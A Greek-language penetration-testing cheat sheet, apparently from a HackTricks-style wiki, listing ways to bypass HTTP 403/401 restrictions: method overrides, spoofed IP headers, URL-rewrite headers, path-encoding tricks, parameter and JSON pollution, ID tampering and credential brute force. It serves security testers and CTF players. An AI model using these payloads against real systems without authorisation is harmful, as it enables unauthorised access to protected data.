403 & 401 Bypasses
Άμεσα διαθέσιμη εγκατάσταση για αξιολόγηση ευπαθειών & δοκιμές διείσδυσης. Εκτελέστε μια πλήρη δοκιμή διείσδυσης από οπουδήποτε με 20+ εργαλεία & χαρακτηριστικά που καλύπτουν από την αναγνώριση μέχρι την αναφορά. Δεν αντικαθιστούμε τους δοκιμαστές διείσδυσης - αναπτύσσουμε προσαρμοσμένα εργαλεία, ανίχνευση & εκμετάλλευση modules για να τους δώσουμε λίγο χρόνο να εξερευνήσουν βαθύτερα, να ανοίξουν κελιά και να διασκεδάσουν.
Αναζήτηση HTTP Ρητών/Μεθόδων
Δοκιμάστε να χρησιμοποιήσετε διαφορετικές ρήτρες για πρόσβαση στο αρχείο: GET, HEAD, POST, PUT, DELETE, CONNECT, OPTIONS, TRACE, PATCH, INVENTED, HACK
Ελέγξτε τις κεφαλίδες απάντησης, ίσως δοθεί κάποια πληροφορία. Για παράδειγμα, μια απάντηση 200 σε HEAD με
Content-Length: 55
σημαίνει ότι η ρήτρα HEAD μπορεί να έχει πρόσβαση στις πληροφορίες. Αλλά πρέπει ακόμα να βρείτε έναν τρόπο να εξαγάγετε αυτές τις πληροφορίες.Χρησιμοποιώντας μια κεφαλίδα HTTP όπως
X-HTTP-Method-Override: PUT
μπορεί να αντικαταστήσει τη ρήτρα που χρησιμοποιήθηκε.Χρησιμοποιήστε τη ρήτρα
TRACE
και αν έχετε πολύ τύχη ίσως στην απάντηση δείτε επίσης τις κεφαλίδες που προστέθηκαν από ενδιάμεσους διακομιστές που μπορεί να είναι χρήσιμες.
Αναζήτηση Κεφαλίδων HTTP
Αλλάξτε την κεφαλίδα Host σε κάποια αυθαίρετη τιμή (που δούλεψε εδώ)
Δοκιμάστε να χρησιμοποιήσετε άλλους User Agents για πρόσβαση στον πόρο.
Αναζήτηση Κεφαλίδων HTTP: Δοκιμάστε να χρησιμοποιήσετε Κεφαλίδες HTTP Proxy, Βασική Αυθεντικοποίηση HTTP και NTLM brute-force (με λίγους συνδυασμούς μόνο) και άλλες τεχνικές. Για όλα αυτά έχω δημιουργήσει το εργαλείο fuzzhttpbypass.
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded: 127.0.0.1
Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
X-Original-URL: 127.0.0.1
Client-IP: 127.0.0.1
True-Client-IP: 127.0.0.1
Cluster-Client-IP: 127.0.0.1
X-ProxyUser-Ip: 127.0.0.1
Host: localhost
Αν η διαδρομή είναι προστατευμένη μπορείτε να δοκιμάσετε να παρακάμψετε την προστασία της διαδρομής χρησιμοποιώντας αυτές τις άλλες κεφαλίδες:
X-Original-URL: /admin/console
X-Rewrite-URL: /admin/console
Αν η σελίδα είναι πίσω από έναν διακομιστή proxy, ίσως είναι ο proxy αυτός που σας εμποδίζει να έχετε πρόσβαση στις ιδιωτικές πληροφορίες. Δοκιμάστε να καταχραστείτε το HTTP Request Smuggling ή κεφαλίδες hop-by-hop.
Αναζητήστε ειδικές κεφαλίδες HTTP ψάχνοντας για διαφορετική απάντηση.
Αναζητήστε ειδικές κεφαλίδες HTTP ενώ αναζητάτε Μέθοδους HTTP.
Αφαιρέστε την κεφαλίδα Host και ίσως να μπορέσετε να παρακάμψετε την προστασία.
Αναζήτηση Διαδρομών
Αν /path είναι μπλοκαρισμένο:
Δοκιμάστε να χρησιμοποιήσετε /%2e/path _(αν η πρόσβαση είναι μπλοκαρισμένη από έναν διακομιστή proxy, αυτό μπορεί να παρακάμψει την προστασία). Δοκιμάστε επίσης_** /%252e**/path (διπλή κωδικοποίηση URL)
Δοκιμάστε Παράκαμψη Unicode: /%ef%bc%8fpath (Οι κωδικοποιημένοι χαρακτήρες URL είναι σαν "/") οπότε όταν αποκωδικοποιηθούν θα είναι //path και ίσως έχετε ήδη παρακάμψει τον έλεγχο ονόματος /path
Άλλες παρακάμψεις διαδρομών:
site.com/secret –> HTTP 403 Forbidden
site.com/SECRET –> HTTP 200 OK
site.com/secret/ –> HTTP 200 OK
site.com/secret/. –> HTTP 200 OK
site.com//secret// –> HTTP 200 OK
site.com/./secret/.. –> HTTP 200 OK
site.com/;/secret –> HTTP 200 OK
site.com/.;/secret –> HTTP 200 OK
site.com//;//secret –> HTTP 200 OK
site.com/secret.json –> HTTP 200 OK (ruby)
Χρησιμοποιήστε όλη αυτή τη λίστα στις ακόλουθες καταστάσεις:
/FUZZsecret
/FUZZ/secret
/secretFUZZ
Άλλες παρακάμψεις API:
/v3/users_data/1234 --> 403 Forbidden
/v1/users_data/1234 --> 200 OK
{“id”:111} --> 401 Μη εξουσιοδοτημένο
{“id”:[111]} --> 200 OK
{“id”:111} --> 401 Μη εξουσιοδοτημένο
{“id”:{“id”:111}} --> 200 OK
{"user_id":"<legit_id>","user_id":"<victims_id>"} (Ρύπανση Παραμέτρων JSON)
user_id=ATTACKER_ID&user_id=VICTIM_ID (Ρύπανση Παραμέτρων)
Αλλαγή Παραμέτρου
Αλλαγή τιμής παραμέτρου: Από
id=123
-->id=124
Προσθήκη επιπλέον παραμέτρων στο URL:
?
id=124
—->id=124&isAdmin=true
Αφαίρεση των παραμέτρων
Αναδιάταξη των παραμέτρων
Χρήση ειδικών χαρακτήρων.
Εκτέλεση δοκιμών ορίων στις παραμέτρους — παρέχοντας τιμές όπως -234 ή 0 ή 99999999 (μόνο μερικές παραδειγματικές τιμές).
Έκδοση Πρωτοκόλλου
Εάν χρησιμοποιείτε HTTP/1.1 δοκιμάστε να χρησιμοποιήσετε το 1.0 ή ακόμα να ελέγξετε αν υποστηρίζει το 2.0.
Άλλες Παρακάμψεις
Λάβετε την IP ή το CNAME του domain και δοκιμάστε να επικοινωνήσετε μαζί του απευθείας.
Δοκιμάστε να επιβαρύνετε τον διακομιστή στέλνοντας συνήθεις αιτήσεις GET (Λειτούργησε για αυτόν τον τύπο με το Facebook).
Αλλαγή του πρωτοκόλλου: από http σε https, ή από https σε http
Πηγαίνετε στο https://archive.org/web/ και ελέγξτε αν στο παρελθόν αυτό το αρχείο ήταν παγκοσμίως προσβάσιμο.
Επίθεση Βίας
Μαντέψτε τον κωδικό πρόσβασης: Δοκιμάστε τα ακόλουθα συνηθισμένα διαπιστευτήρια. Γνωρίζετε κάτι για το θύμα; Ή το όνομα της πρόκλησης CTF;
Επίθεση βίας: Δοκιμάστε βασική, digest και NTLM πιστοποίηση.
Αυτόματα Εργαλεία
Άμεση διαθεσιμότητα εγκατάστασης για αξιολόγηση ευπαθειών & δοκιμές διείσδυσης. Εκτελέστε μια πλήρη δοκιμή διείσδυσης από οπουδήποτε με 20+ εργαλεία & χαρακτηριστικά που καλύπτουν από την αναγνώριση μέχρι την αναφορά. Δεν αντικαθιστούμε τους δοκιμαστές διείσδυσης - αναπτύσσουμε προσαρμοσμένα εργαλεία, ανίχνευση & εκμετάλλευση modules για να τους δώσουμε πίσω χρόνο για να εξερευνήσουν βαθύτερα, να ανοίξουν κελιά και να διασκεδάσουν.
Last updated